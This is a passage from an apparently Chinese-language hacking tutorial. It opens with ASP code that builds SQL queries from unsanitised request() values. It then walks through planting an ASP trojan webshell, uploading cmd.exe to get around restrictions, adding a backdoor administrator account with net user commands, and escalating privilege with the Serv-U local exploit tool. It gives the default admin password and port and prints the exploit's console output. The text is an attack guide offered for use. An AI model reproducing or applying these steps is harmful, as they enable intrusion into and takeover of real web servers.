if typeid<>"" then
sql="select * from info where showname like ’%"&request("txtitle")&"%’ and flag=1 and type like ’%"&request("type")&"%’ and sortid="+cstr(sortid)+" and typeid="&request("typeid")&" order by dateandtime desc"
else
sql="select * from info where showname like ’%"&request("txtitle")&"%’ and flag=1 and type like ’%"&request("type")&"%’ and sortid="+cstr(sortid)+" order by dateandtime desc"
end if
上面的组件中,有两个是很重要的,就是“Shell.Application”和“WScript.Shell”,这两个组件可以支持运行一些cmd命令。
这是我们按照默认情况下搭建的网站,也就是没有做一些安全措施,平常空间商所采用的搭建方式,在这种情况下,我们上传的asp木马可以访问每个磁盘上的内客,并且可以进行修改,在windows2003环境下不可以直接用wscript.shell组件执行命令cmd命令,因为我们的身分是iis guest权限,但上传一个cmd.exe到目录下,再执行cmd命令如下:
将cmd.exe传到d盘下的,所以路径我们调用的d:\cmd.exe,通过这种上传一个cmd.exe的方法突破对服务器上cmd.exe的限制。当然我们不通执行“net user 用户名 密码 /add”种执行“net localgroup administrators 用户名 /add”来增加一个用户名并添为管理员。当然得在asp木马中提升权限,因为现在只是guest 权限,我们引用网上最常见的serv-u本地溢出提升权限,当然方法还有很多。
上传一个su.exe-----serv-u ftp本地溢出工具,serv-u是目前服务器用得最多的ftp工具,但serv-u在目前版本中仍存在这个漏洞,应该不算是漏洞,它默认了一个内置管理员帐户,用户名为:localadministrator密码为:#l@$ak#.lk;0@P 本地端口默认为:43958,我们知道ftp有一个执行权限时可以采用 quote exec site “命令”,来执行系统命令,如增加管理员帐户等。一般的人都未修改这个本地用户,所以导至了黑客们的可乘之机。这里我们执行d:\su.exe 43958 “net user mghk rose /add”和 d:\su.exe 43958 “net localgroup administrators mghk /add”便增加了一个管理员帐户,执行时的信息如下:
Serv-u >3.x Local Exploit by xiaolu
<220 Serv-U FTP Server v5.2 for WinSock ready...
>USER LocalAdministrator
<331 User name okay, need password.
******************************************************
>PASS #l@$ak#.lk;0@P
<230 User logged in, proceed.
******************************************************
>SITE MAINTENANCE
******************************************************
[+] Creating New Domain...
<200-DomainID=2
<220 Domain settings saved
******************************************************
[+] Domain xl:2 created
[+] Creating Evil User
<200-User=xl
200 User settings saved
******************************************************
[+] Now Exploiting...
>USER xl
<331 User name okay, need password.
******************************************************
>PASS 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing: net localgroup administrators mghk /add
<220 Domain deleted